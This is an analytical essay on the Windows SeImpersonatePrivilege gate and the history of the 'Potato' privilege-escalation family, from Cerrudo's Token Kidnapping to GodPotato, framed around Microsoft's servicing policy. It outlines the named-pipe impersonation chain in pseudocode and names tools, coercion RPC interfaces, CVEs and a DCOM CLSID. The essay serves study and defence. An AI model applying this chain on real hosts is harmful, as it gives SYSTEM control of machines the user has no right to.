{` // On a Windows service account, this is the line that matters: const tokenPrivileges = [ { name: 'SeAssignPrimaryTokenPrivilege', state: 'Disabled' }, { name: 'SeIncreaseQuotaPrivilege', state: 'Disabled' }, { name: 'SeAuditPrivilege', state: 'Disabled' }, { name: 'SeChangeNotifyPrivilege', state: 'Enabled' }, { name: 'SeImpersonatePrivilege', state: 'Enabled' }, // <-- the gate { name: 'SeCreateGlobalPrivilege', state: 'Enabled' }, ];

const gateOpen = tokenPrivileges.some( p => p.name === 'SeImpersonatePrivilege' && p.state === 'Enabled' ); console.log(gateOpen ? 'Gate is open. Token-source primitive is the only missing piece.' : 'Gate is closed.'); `}

If one line in whoami /priv is sufficient to become SYSTEM, why does Microsoft ship that line as the default for every IIS application pool, every SQL Server service step, and every Exchange worker process on every shipping Windows release? The answer is not a mistake. It is a decision -- and to understand it we need to go back to a Tymshare FORTRAN compiler in the late 1970s, around 1977 by Hardy's own "about eleven years ago" dating from his 1988 paper.

2. Hardy's Deputy and the 2003 Service-Hardening Pivot

In the late 1970s, around 1977, a Tymshare engineer named Norm Hardy watched a FORTRAN compiler with "home files license" overwrite the system billing file (SYSX)BILL because some user had passed that path as the compiler's debug-output target. The compiler had two authorities -- its own (to read system libraries) and the caller's (to write the caller's files) -- and no way to keep them separate when serving a request. The compiler was, in Hardy's later phrasing, confused about which authority to use [@hardy-1988].

A program that holds authority on behalf of two or more principals at once and has no architectural way to keep those authorities separate when acting on a request. Hardy's 1988 paper [@hardy-1988] argues that any identity-and-ACL system in which a server holds more authority than its clients and acts on client requests has a confused-deputy attack surface by construction. The only complete defence, Hardy argues, is capability-based access control.

Hardy's argument generalises: as long as authority flows ambiently with identity rather than being passed explicitly with each request, a server cannot reliably tell whose authority a given request should run under. This is not a bug class. It is a structural property of the access-matrix model Lampson formalised in 1971 [@lampson-1971]. Windows is an instance of that model. A NETWORK SERVICE process holding SeImpersonatePrivilege is Hardy's deputy: it carries two authorities at once (its own modest service identity and whatever caller just connected to its named pipe), and Windows has no in-architecture way to keep them apart.

Capability systems -- EROS, Coyotos, seL4 -- bind authority to operations rather than to running identities. A capability is an unforgeable token that names both an object and the rights you have on it; you cannot exercise authority you were not handed. In a capability system, Hardy's compiler would have been handed a capability only for the file the caller actually wanted opened, and the bill-overwrite would have been mechanically prevented. Windows shipped the alternative design in 1993 -- identity-and-ACL with kernel tokens carrying ambient authority -- and the rest of this article is, in a precise sense, the story of what that design costs eighteen years on. Section 8 returns to this thread.

2.1 The kernel object Cutler's team shipped in 1993

Dave Cutler's NT 3.1 team chose the identity-and-ACL model and built a kernel object to carry it. The access token is what an NT thread or process holds; it enumerates the user SID, the group SIDs, and the privileges currently associated with the running code. Every access check the kernel performs reduces to "does this token, evaluated against this object's ACL, grant the requested rights?" The standard reference is Windows Internals, Part 1, chapter on security [@ms-learn-windows-internals].

A kernel object the Windows security subsystem creates at logon (and clones on demand). It carries the user SID, group SIDs, privileges, integrity level, and impersonation level for a running thread or process. Tokens come in two flavours: *primary* (attached to a process at creation) and *impersonation* (attached to a thread to make it temporarily act as another identity).

NT 3.1 also shipped two structural distinctions that the rest of this article depends on. First, primary versus impersonation tokens -- a primary token is what a process is born with; an impersonation token is what a thread can wear temporarily to act on behalf of someone else. Second, the four impersonation levels (Anonymous, Identification, Impersonation, Delegation), each granting progressively more authority to act under the borrowed identity. Both distinctions exist because servers need to act on client requests under the client's authority -- and both distinctions are the surface every Potato variant operates on.

The Tymshare anecdote that Hardy uses in the 1988 paper -- the FORTRAN compiler that overwrote (SYSX)BILL -- is worth recounting in full because it is structurally identical to the Windows scenario. A user invoked the compiler with the billing information file as the debug-output target. The compiler had write access to system files (it was a "home files license" service). The compiler dutifully opened the user-supplied path under its own authority and wrote debug output to it, destroying the bill. The compiler was not malicious; it had no way to ask the OS to scope its write to "only files the caller could write." Hardy's own dating in the paper is "about eleven years ago" from 1988 -- so the events sit in the late 1970s, not the early ones.

2.2 Why the privilege exists: the 2003 service-hardening pivot

Through the 1990s, Windows services almost universally ran under NT AUTHORITY\SYSTEM. The convenience was operational: SYSTEM is the local-machine principal and holds every right the kernel knows about, so a service running as SYSTEM never needed an explicit privilege grant. The cost became visible in 2001-2003 as the first generation of service-borne worms hit production: Code Red and Nimda (2001) walked IIS; SQL Slammer and MSBlast (2003) walked SQL Server and the DCOM RPC endpoint [@wikipedia-timeline-worms]. Every successful remote code execution against a service became a SYSTEM compromise of the host, because the service was SYSTEM.

Microsoft's response was a structural retreat. Two new well-known accounts shipped in Windows Server 2003 (and reached desktop with XP SP2 in 2004): NT AUTHORITY\LOCAL SERVICE (no network credentials) and NT AUTHORITY\NETWORK SERVICE (machine-account credentials when authenticating off-box). The two account documentation pages enumerate the default privileges the SCM assigns when a service is configured to run under either account [@ms-learn-localservice; @ms-learn-networkservice]. Most of the SYSTEM-only privileges -- SeTcbPrivilege, SeLoadDriverPrivilege, SeRestorePrivilege -- are absent from the enumerated default sets [@ms-learn-localservice; @ms-learn-networkservice]. The intent was clear: a worm-popped IIS worker should land as a low-privileged process, not as SYSTEM.

But the new accounts could not lose every SYSTEM authority. Pre-2003 services routinely impersonated their clients to make access checks against per-user resources -- IIS reading a user's home directory under the user's identity, SQL Server enforcing per-login row security, the SMB server returning per-user file lists. That entire pattern depended on the service being able to call ImpersonateNamedPipeClient (or RpcImpersonateClient, or one of the LSA-side APIs) and then act under the caller's token. If LOCAL SERVICE and NETWORK SERVICE could not impersonate, the entire RPC server population would break.

So Microsoft introduced SeImpersonatePrivilege -- a new named user right gating the impersonation APIs -- and assigned it by default to the local Administrators group, LOCAL SERVICE, NETWORK SERVICE, and the SERVICE well-known group; because the SCM adds the SERVICE group SID to every service token, SCM-started services inherit the right through that assignment [@ms-learn-impersonate-policy]. The policy-setting page is explicit about the intent: "If this user right is required for this type of impersonation, an unauthorized user cannot cause a client to connect (for example, by remote procedure call (RPC) or named pipes) to a service that they have created to impersonate that client" [@ms-learn-impersonate-policy].

The privilege, in other words, was created as a mitigation. Its purpose was to keep impersonation working for legitimate service-account RPC servers while denying it to ordinary user processes. That decision -- to gate impersonation on an explicit named right rather than to forbid impersonation outright -- is the architectural pivot the rest of this article re-examines from every angle.

flowchart TD Client["Low-privileged caller"] -- "Connects to attacker pipe" --> NS["NETWORK SERVICE process"] NS -- "Holds its own modest authority" --> A1["Authority 1, service identity"] NS -- "Holds SeImpersonatePrivilege" --> A2["Authority 2, any token it receives"] SYSPROC["Privileged caller, SYSTEM"] -- "Coerced to authenticate to the pipe" --> NS NS -- "Impersonate caller token, then act" --> Action["Action runs under SYSTEM"]

Microsoft did not introduce SeImpersonatePrivilege to enable an exploit. They introduced it as a backward-compatibility concession. So why did the privilege become the dominant lineage of service-to-SYSTEM elevation for nearly two decades? The answer starts with the API surface.

3. The Token API Surface

There is no single "impersonate" API on Windows. There are four substitution APIs that put a token on a thread or a new process, and one coercion API that supplies the token in the first place. The Potato family lives at the intersection of all five.

3.1 Primary versus impersonation tokens

The kernel distinguishes TOKEN_PRIMARY from TOKEN_IMPERSONATION. A primary token is what a process is created with; an impersonation token can be attached only to a thread. The distinction matters operationally because only an impersonation token at level SecurityImpersonation or SecurityDelegation lets you take real action under the borrowed identity. An Identification-level token can be checked against ACLs but cannot be used to open kernel objects under the new identity, and an Anonymous-level token is useless for almost everything [@ms-learn-windows-internals; @ms-learn-impersonateloggedonuser].

A *primary token* is created at logon and attached to a process for its lifetime; the kernel uses it for every access check the process makes by default. An *impersonation token* is attached to an individual thread by `SetThreadToken` (or by an impersonation API that calls it internally) and overrides the primary token for that thread only. The kernel reserves the right to demote impersonation tokens to `Identification` level in cross-machine RPC scenarios where delegation has not been explicitly negotiated. A four-value enum -- `SecurityAnonymous`, `SecurityIdentification`, `SecurityImpersonation`, `SecurityDelegation` -- carried on every impersonation token. It limits what the impersonating thread can do under the borrowed identity. `SecurityImpersonation` is the level a service can act under for local access checks; `SecurityDelegation` extends that to off-box authentication and is the level the LocalPotato class occasionally reaches.

The Potato lineage navigates these four levels with care. Identification is harmless because it cannot spawn a process under the borrowed identity; Impersonation is the level a service can act under for any local kernel object; Delegation is what cross-host variants such as SilverPotato sometimes need.

The SecurityIdentification versus SecurityImpersonation distinction is the gate that makes many naive coercion attempts fail. If the attacker controls only an RPC interface that performs an ImpersonateClient call without the right SQOS (Security Quality of Service) negotiation, the resulting token may land at SecurityIdentification -- usable for AccessCheck, useless for CreateProcessWithTokenW. Each Potato variant either chooses a coercion primitive that arrives at SecurityImpersonation or upgrades the token via a subsequent DuplicateTokenEx.

3.2 The substitution primitives

Four APIs move tokens around the system. None of them produces a token from nothing; all of them assume the caller already has a handle to one.

SetThreadToken -- attach an impersonation token to a thread [@ms-learn-setthreadtoken]. The thread now runs under the borrowed identity for every subsequent access check.
ImpersonateLoggedOnUser -- the thread-level convenience wrapper [@ms-learn-impersonateloggedonuser]. Same effect as SetThreadToken, with simpler arguments.
DuplicateTokenEx -- create a new token from an existing one, with adjustable type (primary vs impersonation) and level (the four-value enum above) [@ms-learn-duplicatetokenex]. The Potato lineage uses this to convert an impersonation token into a primary one before launching a process.
CreateProcessWithTokenW -- spawn a new process under an arbitrary primary token [@ms-learn-createprocesswithtokenw]. The Microsoft Learn documentation is explicit about the gate: "The process that calls CreateProcessWithTokenW must have the SE_IMPERSONATE_NAME privilege."

That last sentence is the keystone. SeImpersonatePrivilege is not just "the right to impersonate." It is the right to convert an impersonated identity into a fresh process that owns the desktop, the registry, the file system, and every other kernel object the borrowed identity has authority over. Without the privilege, the attacker has a thread temporarily wearing SYSTEM's hat; with it, the attacker has cmd.exe running as SYSTEM until the system reboots.

3.3 The coercion primitive

The three substitution primitives are inert without a token to substitute. The dominant token source on Windows is the named-pipe server primitive ImpersonateNamedPipeClient, shipped since Windows XP / Server 2003 [@ms-learn-impersonatenamedpipeclient]. Any process that owns a named pipe can call this API after a client connects; the impersonating thread then wears the caller's token at whatever impersonation level the caller's SQOS negotiated.

A Win32 API that copies the connected client's access token onto the calling thread, after which the thread acts under the client's identity until `RevertToSelf` is called. The API has shipped since Windows XP / Server 2003 [@ms-learn-impersonatenamedpipeclient]. It is the load-bearing token source for every Potato variant from HotPotato through GodPotato. Calling the API at higher than `SecurityIdentification` requires `SeImpersonatePrivilege` on the caller.

This is the four-step chain every Potato operator runs, as enumerated in Forshaw's 2021 Project Zero retrospective on the lineage [@forshaw-2021-10-relaying-dcom-pz]:

CreateNamedPipe("\\.\pipe\<attacker_name>") -- a service-account process opens a pipe it controls.
Induce some privileged Windows component to authenticate to that pipe.
ImpersonateNamedPipeClient -- the impersonating thread now wears the caller's token.
DuplicateTokenEx to primary; CreateProcessWithTokenW(cmd.exe).

sequenceDiagram participant Atk as Attacker, service account participant Pipe as Named pipe attacker controls participant Sys as Privileged caller, SYSTEM-context Atk->>Pipe: CreateNamedPipe and listen Atk->>Sys: Trigger coercion primitive Sys->>Pipe: Authenticate to the pipe Atk->>Pipe: ImpersonateNamedPipeClient Atk->>Atk: DuplicateTokenEx, impersonation to primary Atk->>Atk: CreateProcessWithTokenW cmd.exe Note over Atk: cmd.exe now running as SYSTEM

Step three depends on step two. Impersonating the client depends on first receiving the privileged authentication, and that authentication, the question of where the token comes from, is the one every generation of Potato has answered differently -- and that Microsoft has patched, one token source at a time, for nearly two decades.

{` // Pseudocode showing the four-step Potato chain. // Privilege checks shown as comments where the kernel enforces them.

function impersonationChain(coercionTrigger) { const pipe = createNamedPipe("\\.\pipe\demo"); // no privilege required coercionTrigger(pipe); // induce SYSTEM to connect pipe.waitForConnect();

// kernel allows SecurityImpersonation only if caller has SeImpersonatePrivilege: const callerToken = pipe.impersonateNamedPipeClient();

const primary = duplicateTokenEx(callerToken, "primary", "SecurityImpersonation"); // no privilege required

// kernel gate: requires SE_IMPERSONATE_NAME on the calling process: return createProcessWithTokenW(primary, "cmd.exe"); } `}

3.4 The privilege next to it

CreateProcessWithTokenW is gated on SeImpersonatePrivilege. Its sibling CreateProcessAsUser is gated on a different pair of privileges -- SeAssignPrimaryTokenPrivilege (constant name SE_ASSIGNPRIMARYTOKEN_NAME) when the supplied token is not assignable by the caller, plus SeIncreaseQuotaPrivilege (SE_INCREASE_QUOTA_NAME) in all cases. Both are enumerated separately in the privilege-constants table [@ms-learn-privilege-constants]. On a NETWORK SERVICE or LOCAL SERVICE token, SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME are both present but disabled [@ms-learn-localservice; @ms-learn-networkservice]: a service-account process must call AdjustTokenPrivileges to enable them before CreateProcessAsUser will succeed, whereas SeImpersonatePrivilege is shipped enabled and CreateProcessWithTokenW works on the first instruction. Pierini's aphorism quoted in section 1 names both privileges because either one independently makes the same chain runnable -- but on a vanilla NETWORK SERVICE token, only SeImpersonatePrivilege is enabled, and the rest of this article treats it as the privilege that matters in practice.

API	Privilege required	Input	Output
`ImpersonateNamedPipeClient`	none for `SecurityIdentification` or `SecurityAnonymous`; for higher levels, either `SeImpersonatePrivilege`, or the token was created with explicit credentials via `LogonUser`/`LsaLogonUser` from within the caller's logon session, or the authenticated identity is the same as the caller (see [@ms-learn-impersonatenamedpipeclient])	connected pipe handle	impersonation token on thread
`ImpersonateLoggedOnUser`	none (caller must already hold the token)	token handle	impersonation token on thread
`SetThreadToken`	depends on token level	token handle	impersonation token on thread
`DuplicateTokenEx`	none	source token	new token, type/level adjustable
`CreateProcessWithTokenW`	`SeImpersonatePrivilege`	primary token + command line	new process
`CreateProcessAsUser`	`SeAssignPrimaryTokenPrivilege`	primary token + command line	new process

flowchart LR Process["Process, holds primary token"] Thread["Thread, optional impersonation token"] NewProc["New process, spawned with chosen primary token"] Process -- "OpenProcessToken, read" --> TH["Token handle"] TH -- "SetThreadToken or ImpersonateLoggedOnUser" --> Thread Thread -- "GetThreadToken" --> TH TH -- "DuplicateTokenEx, impersonation to primary" --> PT["Primary token handle"] PT -- "CreateProcessWithTokenW, gated on SeImpersonatePrivilege" --> NewProc Pipe["Connected named pipe"] -- "ImpersonateNamedPipeClient, gated on SeImpersonatePrivilege beyond SecurityIdentification" --> Thread

Note: The five-API surface decomposes cleanly into two halves. SeImpersonatePrivilege is the kernel-side gate that decides whether a process can substitute an arbitrary primary token into a new process. ImpersonateNamedPipeClient is the user-mode source that provides the token in the first place. Closing one half closes the surface. Closing neither half is the choice Microsoft has shipped for twenty years.

So how do you get a SYSTEM-context Windows process to authenticate to a pipe you control? Cesar Cerrudo asked that question in 2008 -- and his answer was just the first of five.

4. Five Generations of Token Sources, One Constant Privilege

Cesar Cerrudo had the privilege figured out in April 2008. So why did it take until January 2016 for HotPotato to make the chain pushbutton, until August 2018 for JuicyPotato to industrialise it, and until December 2022 for GodPotato to bypass the most aggressive DCOM hardening Microsoft has shipped? Because every generation answered the same question -- where do the tokens come from? -- differently, and Microsoft patched each token source one at a time.

This section is generation-level. The variant-by-variant chronology of every named Potato lives in the sibling Potato Family article (2026-05-31); here, variants appear only as evidence for claims about the primitive.

4.1 Generation 1, direct token theft (2008-2010)

Cerrudo's HITB Dubai 2008 paper, Token Kidnapping, named the privilege and named the technique [@cerrudo-2008-pdf]. The chain ran inside an MSSQL or IIS process and looked like this: enumerate processes the service account could open; find a thread that was already impersonating a higher-privileged token (typically leaked by some service-startup path); DuplicateTokenEx that token; CreateProcessWithTokenW to spawn cmd.exe under the new identity. Two years later, at DEF CON 18, Cerrudo presented Token Kidnapping's Revenge with fresh examples and a community-canonical title for the technique [@cerrudo-2010-defcon].

Microsoft's response was MS09-012 in April 2009 (community-known as the Chimichurri fix, after Cesar Cerrudo's PoC of the same name shipped by Argeniss alongside the disclosure [@webarchive-argeniss-chimichurri; @forshaw-2020-01-empirical-wsh]). The MSRC blog post announcing the bulletin is unusually clear about what it closed and what it deliberately did not:

An attacker can escalate their privileges on a system if they can control the SeImpersonatePrivilege token. An attacker would need to be executing code in the context of a Windows service to use this exploit. -- MSRC blog, April 14, 2009 [@msrc-blog-2009-04-token-kidnapping]

The MSRC text continues: "the first update addresses service isolation, while the second addresses processes running as service accounts" [@msrc-blog-2009-04-token-kidnapping]. Service isolation, not the privilege itself. The bulletin closed the specific handle-leak surface Cerrudo had used -- it did not revoke SeImpersonatePrivilege from NETWORK SERVICE, did not modify CreateProcessWithTokenW, did not modify ImpersonateNamedPipeClient. The MSRC acknowledged on the record that the privilege was sufficient for the escalation and elected to fix the symptom (the leak surface), not the gate.

This is the supersession pattern that every subsequent generation follows: Microsoft patches the current token source; the next generation finds a new one within months.

Chimichurri (sometimes Chimichurri.exe) is not a Microsoft codename. It is the name Cesar Cerrudo gave to the PoC exploit Argeniss released alongside the MS09-012 bulletin, hosted at the time at argeniss.com/research/Chimichurri_CesarCerrudo.zip and preserved in the Internet Archive [@webarchive-argeniss-chimichurri]. Microsoft's own naming for the bulletin is simply MS09-012 / KB959454. Offensive-research convention has used "Chimichurri" as shorthand for the Cerrudo PoC ever since -- never for a Microsoft internal codename. Forshaw's January 2020 service-hardening retrospective references the same Cerrudo / Argeniss lineage [@forshaw-2020-01-empirical-wsh].

Cerrudo presented the 2008 paper under his Argeniss affiliation and the 2010 DEF CON talk under IOActive [@cerrudo-2008-pdf; @cerrudo-2010-defcon]. The affiliation change occasionally trips up archival cross-referencing -- the work is the same lineage.

4.2 Generation 2, local NTLM cross-protocol reflection (2014-2016)

In December 2014, James Forshaw filed Project Zero Issue 222 -- a WebDAV-to-SMB local NTLM reflection that turned the Windows authentication redirector into a self-service token source. Stephen Breen's HotPotato (January 16, 2016) used a related local-NTLM-relay primitive to deliver the first end-to-end service-account-to-SYSTEM chain that did not depend on finding a leaked token handle [@breen-2016-hot-potato]. Breen credits the genealogy openly: "If this sounds vaguely familiar, it's because a similar technique was disclosed by the guys at Google Project Zero . . . In fact, some of our code was shamelessly borrowed from their PoC and expanded upon" [@breen-2016-hot-potato].

The conceptual leap is the one every subsequent generation depends on. Cerrudo's G1 had to find a high-privileged token leaked into the local process tree; Breen's G2 makes the system hand you one by coercing it to authenticate. The system itself becomes the token source. Forshaw articulated this generalisation explicitly in the 2021 Project Zero retrospective on the entire lineage [@forshaw-2021-10-relaying-dcom-pz].

Microsoft's response was MS16-075 (the SMB-side fix) and a handful of WPAD-hardening rollups. The chain became fragile and stopped being pushbutton -- but, again, none of these changes touched SeImpersonatePrivilege or ImpersonateNamedPipeClient.

4.3 Generation 3, local DCOM activation (2016-2018)

Within months of HotPotato, the community converged on a more reliable coercion primitive: a forged DCOM OBJREF marshalled with an attacker-chosen OXID resolver. The trick induces a SYSTEM-context COM server to authenticate to a named pipe the attacker controls. Forshaw had reported the underlying primitive at Project Zero in 2015 as Issue 325, fixed as CVE-2015-2370 [@nvd-cve-2015-2370], but as his 2021 retrospective notes:

"The technique to locally relay authentication for DCOM was something I originally reported back in 2015 (issue 325). This issue was fixed as CVE-2015-2370, however the underlying authentication relay using DCOM remained. This was repurposed and expanded upon by various others for local and remote privilege escalation in the RottenPotato series of exploits, the latest in that line being RemotePotato which is currently unpatched as of October 2021." [@forshaw-2021-10-relaying-dcom-pz]

The DCOM service that maps an OXID (Object Exporter Identifier) to the RPC binding string a client uses to call methods on a marshalled COM object. The "Rotten" and "Juicy" Potato families forge `OBJREF` marshalled blobs in which the OXID resolver field points back at an attacker-controlled endpoint, causing the SYSTEM-context RPCSS to authenticate to the attacker's pipe when it tries to resolve the OXID.

RottenPotato (September 26, 2016) demonstrated the chain [@foxglove-2016-09-rotten-potato]; JuicyPotato (July 2018) industrialised it with a configurable CLSID table and reliable pipe handling. The canonical mirror for the JuicyPotato repository is the ohpe/juicy-potato GitHub project [@ohpe-juicy-potato-repo]. Crucially, the load-bearing API was still ImpersonateNamedPipeClient -- the DCOM trick is just the vehicle that delivers a SYSTEM-context authentication to the attacker's pipe.

4.4 Generation 4, coercion APIs beyond DCOM (2020-2024)

Clement Labro (itm4n) shipped PrintSpoofer on May 1, 2020 [@labro-2020-printspoofer-post; @itm4n-printspoofer-repo]. The coercion primitive was MS-RPRN's RpcRemoteFindFirstPrinterChangeNotificationEx -- an RPC method on the Print Spooler that takes an attacker-supplied UNC-like notification target and authenticates to it under the Spooler's SYSTEM identity. PrintSpoofer needed neither DCOM nor any leaked handle; the coercion primitive lived inside a always-running Windows service.

PrintSpoofer generalised. Researchers quickly mapped a family of Windows RPC interfaces with the same shape -- an RPC method that takes an attacker-supplied path and resolves it server-side under a privileged identity. MS-EFSR (the Encrypting File System remote protocol) gave EfsPotato and SharpEfsPotato -- the canonical fork is bugch3ck/SharpEfsPotato [@bugch3ck-sharpefspotato-repo], not the ly4k mirror. MS-FSRVP, MS-DFSNM, and a long tail followed. CoercedPotato's --interface {ms-rprn, ms-efsr} switch operationalises the enumeration in a single tool [@prepouce-coercedpotato-repo]; the project's MS-EFSR catalogue alone lists fourteen entry points (indices 0-13, with two marked NOT WORKING).

The pattern is clear at this point: the privilege is the constant; the coercion primitive is interchangeable. Microsoft has shipped per-CVE patches for individual coercion APIs (the PrintNightmare cluster around MS-RPRN, anchored by CVE-2021-34527 [@nvd-cve-2021-34527]; targeted MS-EFSR fixes), but no commitment to enumerate or class-close the surface.

4.5 Generation 5, into RPCSS itself (2022-2024)

In December 2022, the researcher who goes by BeichenDream published GodPotato, with a README that names the structural defect plainly:

"Based on the history of Potato privilege escalation for 6 years, from the beginning of RottenPotato to the end of JuicyPotatoNG, I discovered a new technology by researching DCOM, which enables privilege escalation in Windows 2012 - Windows 2022, now as long as you have ImpersonatePrivilege permission. Then you are NT AUTHORITY\SYSTEM . . . There are some defects in rpcss when dealing with oxid, and rpcss is a service that must be opened by the system." [@beichendream-godpotato-readme]

GodPotato survives every phase of CVE-2021-26414 (the three-phase DCOM hardening, rolled out 2021-06-08, 2022-06-14, 2023-03-14) [@nvd-cve-2021-26414] because the defect is in RPCSS's OXID handling, not in DCOM activation. The other structural half of the defect is documented by Forshaw in April 2020: "When LSASS creates a Token for a new Logon session it stores that Token for later retrieval . . . in this case it does matter as it means that the negotiated Token on the server, which is the same machine, will actually be the session's Token, not the caller's Token" [@forshaw-2020-04-sharing-logon-session]. Together those two structural properties keep GodPotato functional across the README's tested matrix -- Server 2012 through Server 2022, Windows 8 through Windows 11 -- and no public Microsoft patch has been issued for the underlying defect through mid-2026 [@beichendream-godpotato-readme].

LocalPotato (February 2023) is the parallel branch: Antonio Cocomazzi and Andrea Pierini discovered that the NTLM Type-2 "Reserved" field could be used to swap context handles during local authentication, escalating from an unprivileged user -- the first variant in the lineage that does not require SeImpersonatePrivilege to start [@cocomazzi-pierini-2023-localpotato-post]. Microsoft fixed it as CVE-2023-21746 [@nvd-cve-2023-21746], but the conceptual proof remains: the local NTLM stack itself is an attacker-controllable token source.

SilverPotato (April 24, 2024) extended the family across hosts [@pierini-2024-silverpotato-post]. Members of the Distributed COM Users or Performance Log Users groups trigger remote activation of the sppui DCOM application (CLSID {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}) on a target server. The coerced Domain Admin authentication is then chained through SMB relay to the ADCS host, SAM dump, Pass-the-Hash, CA private key extraction, and ForgeCert to mint a Domain Admin certificate. Microsoft fixed SilverPotato as CVE-2024-38061 in the July 2024 Patch Tuesday [@nvd-cve-2024-38061]; the original researcher's credit was subsequently removed after a second-reporter overlap and an MSRC severity re-grading from moderate to important [@pierini-2024-silverpotato-post]. The structural primitive the chain exploits -- DCOM cross-session activation gated on Distributed COM Users / Performance Log Users group membership chained into a cross-host NTLM relay -- remains a per-CVE rather than a class-level close.

FakePotato (CVE-2024-38100, July 2024 KB5040434) closed the ShellWindows DCOM activation path that Pierini disclosed; the patch shipped about a month before the public disclosure [@nvd-cve-2024-38100; @pierini-2024-fakepotato-post].

James Forshaw's writing is, by some margin, the single most-cited body on the impersonation primitive in the offensive-research community. Four single-author primaries underpin most of this article: *The Art of Becoming TrustedInstaller* (2017-08) on Service-SID derivation [@forshaw-2017-08-trustedinstaller]; *Empirically Assessing Windows Service Hardening* (2020-01), the canonical empirical assessment of what the WSH stack actually closes and what it does not [@forshaw-2020-01-empirical-wsh]; *Sharing a Logon Session a Little Too Much* (2020-04), which documents the LSASS cached-token defect that GodPotato later weaponised [@forshaw-2020-04-sharing-logon-session]; and *Windows Exploitation Tricks: Relaying DCOM Authentication* (2021-10), the Project Zero retrospective that names the genealogy from Issue 325 to RemotePotato [@forshaw-2021-10-relaying-dcom-pz]. Forshaw's 2020-01 opening sentence is the line every defender quotes back: "In the past few years there's been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege" [@forshaw-2020-01-empirical-wsh]. flowchart TD G1["G1, 2008-2010, Cerrudo Token Kidnapping, leaked impersonation handles"] G2["G2, 2014-2016, HotPotato, local NTLM WPAD reflection"] G3["G3, 2016-2018, RottenPotato, JuicyPotato, DCOM OXID activation"] G4["G4, 2020-2024, PrintSpoofer, CoercedPotato, non-DCOM RPC coercion"] G5["G5, 2022-2024, GodPotato, LocalPotato, SilverPotato, RPCSS OXID and NTLM-loopback defects"] Constant["SeImpersonatePrivilege plus ImpersonateNamedPipeClient, unchanged 2003 through 2026"] G1 -- "MS09-012, Cerrudo Chimichurri PoC" --> G2 G2 -- "MS16-075 plus WPAD hardening" --> G3 G3 -- "Win10 1809 OXID hardening, then CVE-2021-26414 three phases" --> G4 G4 -- "Per-CVE coercion-API patches, PrintNightmare cluster" --> G5 G5 -- "GodPotato unpatched, SilverPotato patched CVE-2024-38061, LocalPotato patched CVE-2023-21746, FakePotato patched CVE-2024-38100" --> Open["Mid-2026 state, still functional via GodPotato and the coercion-API long tail"] G1 --- Constant G2 --- Constant G3 --- Constant G4 --- Constant G5 --- Constant

Generation	Years	Token source	Microsoft response	Still works in 2026?
G1 Direct Token Theft (Cerrudo)	2008-2010	Leaked impersonation handles	MS09-012 (Cerrudo Chimichurri PoC)	No (handle leaks closed)
G2 Local NTLM Reflection (HotPotato)	2014-2016	WPAD + HTTP-to-SMB reflection	MS16-075 + WPAD hardening	No (chain too fragile)
G3 DCOM Activation (Rotten/Juicy)	2016-2018	Coerced DCOM auth to attacker pipe	Win10 1809 OXID + CVE-2021-26414	Partial (some LTSC pins)
G4 Non-DCOM RPC Coercion (PrintSpoofer/Coerced)	2020-2024	MS-RPRN / MS-EFSR / MS-FSRVP coercion	Per-CVE patches	Yes (long tail)
G5 RPCSS OXID + NTLM-Loopback (GodPotato/Local/Silver)	2022-2024	RPCSS handling defect + cross-host NTLM relay	None for GodPotato; CVE-2023-21746 for LocalPotato; CVE-2024-38061 for SilverPotato (July 2024)	Yes (GodPotato unaddressed)

Microsoft's umbrella term for the post-2003 stack of mitigations around the service-account population: Service SIDs, restricted tokens, write-restricted tokens, integrity levels for services, the SCM's per-service required-privileges list, and the LPAC variants for select Windows components. The hardening is real, but as section 7 establishes, Microsoft has elected not to treat WSH as a *security* boundary.

Key idea: Eighteen years. Five generations. One privilege. The variable is the token source; the constant is the gate.

Each generation tells a story of an MSRC bulletin that closed a specific token source and a researcher who found a new one within months. But every generation also leaves the same three components in place: the privilege, the named-pipe coercion API, and Microsoft's choice not to close the family at its root. What if those three components, taken together, form a closed system?

5. The Three-Piece Theorem

The Potato lineage is not a collection of bugs. It is the consequence of a single architectural identity:

Key idea: SeImpersonatePrivilege + ImpersonateNamedPipeClient + the MSRC servicing-criteria carve-out = service-account-to-SYSTEM.

Each summand is individually documented. Each is individually shipped by Microsoft. Each is individually justified by a real engineering or product requirement. Together they form a closed system that no point fix can break, because removing any one of them breaks a documented Windows behaviour shipped applications depend on.

This is the article's main contribution: re-frame the eighteen-year named-exploit lineage as the consequence of a documented three-piece architectural decision rather than as a series of bugs.

Component 1: the privilege

SeImpersonatePrivilege is enumerated in the privilege-constants table as SE_IMPERSONATE_NAME [@ms-learn-privilege-constants] and is the subject of a dedicated security-policy page that lists default assignments [@ms-learn-impersonate-policy]. The LOCAL SERVICE and NETWORK SERVICE account documentation each enumerate it as (enabled) in the default privilege set [@ms-learn-localservice; @ms-learn-networkservice].

Cost of removal: every shipping RPC server that impersonates clients breaks; §7.1 walks through the production-Windows surface this affects in detail.

Component 2: the coercion API

ImpersonateNamedPipeClient has shipped since Windows XP / Server 2003 [@ms-learn-impersonatenamedpipeclient]. It is the standard mechanism by which a Win32 RPC server picks up the identity of a connecting client to make per-user access checks. Deprecating it is not a question of swapping one API for another -- the Microsoft-recommended impersonation APIs (RpcImpersonateClient, the LSA-side variants) ultimately compose into the same kernel-side token-substitution call.

Cost of removal: the named-pipe RPC server population that pre-dates the modern impersonation APIs breaks; §7.3 details the SMB-redirector, Print-Spooler, EFS-RPC, and broader Win32 ABI migration cost.

Component 3: the carve-out

Microsoft's public policy document defining what counts as a security boundary, a security feature, and a defence-in-depth feature for servicing purposes. The two-question test is direct: "Does the vulnerability violate the goal or intent of a security boundary or a security feature? Does the severity of the vulnerability meet the bar for servicing?" If either answer is no, "the vulnerability will be considered for the next version or release of Windows but will not be addressed through a security update or guidance" [@msrc-windows-security-servicing-criteria].

The MSRC Windows Security Servicing Criteria document [@msrc-windows-security-servicing-criteria] is the policy-level anchor. The operational articulation came at Troopers 24 from Pierini and Cocomazzi, who named the doctrine in three sentences anchored on the WSH-as-safety-not-security distinction [@pierini-cocomazzi-troopers24-talk]. §7 opens with the full quote and walks through its implications; for the three-piece theorem here, what matters is that the carve-out is documented and Microsoft-position-as-stated, not inferred from per-CVE behaviour.

Cost of removal: Microsoft commits to the per-CVE cadence becoming a structural-close cadence -- servicing every coercion API in the long tail, every NTLM-loopback edge case, every cross-session token confusion, on the same SLAs as kernel RCEs. The MSRC has explicitly declined to take on that workload [@msrc-windows-security-servicing-criteria].

